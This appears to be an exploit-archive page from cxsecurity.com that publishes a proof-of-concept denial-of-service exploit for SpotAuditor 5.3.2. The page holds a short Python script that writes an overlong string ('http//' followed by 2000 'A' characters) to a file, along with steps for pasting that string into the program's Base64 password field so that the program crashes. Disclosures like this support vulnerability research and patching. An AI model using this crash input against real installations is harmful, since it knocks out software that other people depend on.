SpotAuditor 5.3.2 Denial Of Service

2019.11.29
fr ZwX (FR) fr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC) #Exploit Author : ZwX #Exploit Date: 2019-11-26 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Tools -> Base64 Encrypted Password 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top